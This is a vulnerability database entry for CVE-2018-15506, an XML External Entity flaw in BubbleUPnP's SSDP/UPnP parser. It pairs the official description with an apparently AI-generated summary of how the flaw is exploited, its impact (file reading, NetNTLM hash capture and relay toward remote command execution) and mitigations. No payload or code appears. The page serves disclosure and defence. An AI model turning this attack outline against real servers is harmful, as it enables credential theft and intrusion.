CVE-2018-15506
Description
In BubbleUPnP 0.9 update 30, the XML parsing engine for SSDP/UPnP functionality is vulnerable to an XML External Entity Processing (XXE) attack. Remote, unauthenticated attackers can use this vulnerability to: (1) Access arbitrary files from the filesystem with the same permission as the user account running BubbleUPnP, (2) Initiate SMB connections to capture a NetNTLM challenge/response and crack the cleartext password, or (3) Initiate SMB connections to relay a NetNTLM challenge/response and achieve Remote Command Execution in Windows domains.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
BubbleUPnP 0.9 update 30 is vulnerable to XXE via its SSDP/UPnP XML parser, allowing remote unauthenticated attackers to read files, capture NetNTLM hashes, or achieve RCE on Windows domains.
Vulnerability
BubbleUPnP version 0.9 update 30 contains an XML External Entity (XXE) vulnerability in the XML parsing engine used for SSDP/UPnP functionality. The parser fails to disable external entity processing, allowing remote attackers to supply malicious XML payloads. This affects the BubbleUPnP server component, which processes UPnP discovery and control messages. The exact vulnerable versions are 0.9 update 30 and possibly earlier releases; later updates (e.g., 0.9 update 50 [1]) include general fixes but do not explicitly mention an XXE patch.
Exploitation
An attacker can exploit this vulnerability by sending a specially crafted SSDP or UPnP XML request to the BubbleUPnP server on the local network. No authentication or prior access is required. The attacker crafts an XML payload that references external entities, pointing to local files or an SMB share. The server's parser then processes the entity, potentially exfiltrating data via out-of-band channels (e.g., HTTP or SMB) or performing Server-Side Request Forgery (SSRF) to internal SMB servers.
Impact
Successful exploitation allows the attacker to: 1. Read arbitrary files from the server's filesystem with the permissions of the BubbleUPnP user account, leading to sensitive information disclosure (e.g., configuration files, passwords, or tokens). 2. Initiate SMB connections to a remote attacker-controlled server, capturing a NetNTLM challenge/response hash. This hash can be used offline to crack the user's cleartext password or relayed to gain Remote Command Execution (RCE) on Windows domain networks. 3. Further leverage the SMB relay for lateral movement or privilege escalation within a Windows domain environment.
Mitigation
As of the latest available changelog [1], BubbleUPnP Server version 0.9 update 50 (released January 2, 2025) does not explicitly list a fix for this XXE vulnerability. Users should review the changelog for any security-related changes and consider upgrading to the latest version. If no official patch is confirmed, workarounds include restricting network access to the BubbleUPnP server (e.g., firewall rules) or disabling UPnP/SSDP functionality if not required. The CVE is not listed on CISA's Known Exploited Vulnerabilities (KEV) catalog as of the publication date.
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2- BubbleUPnP/BubbleUPnPdescription
- Range: <= 0.9 update 30
Patches
0No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
1- www.bubblesoftapps.com/bubbleupnpserver2/docs/changelog.htmlmitrex_refsource_CONFIRM
News mentions
0No linked articles in our index yet.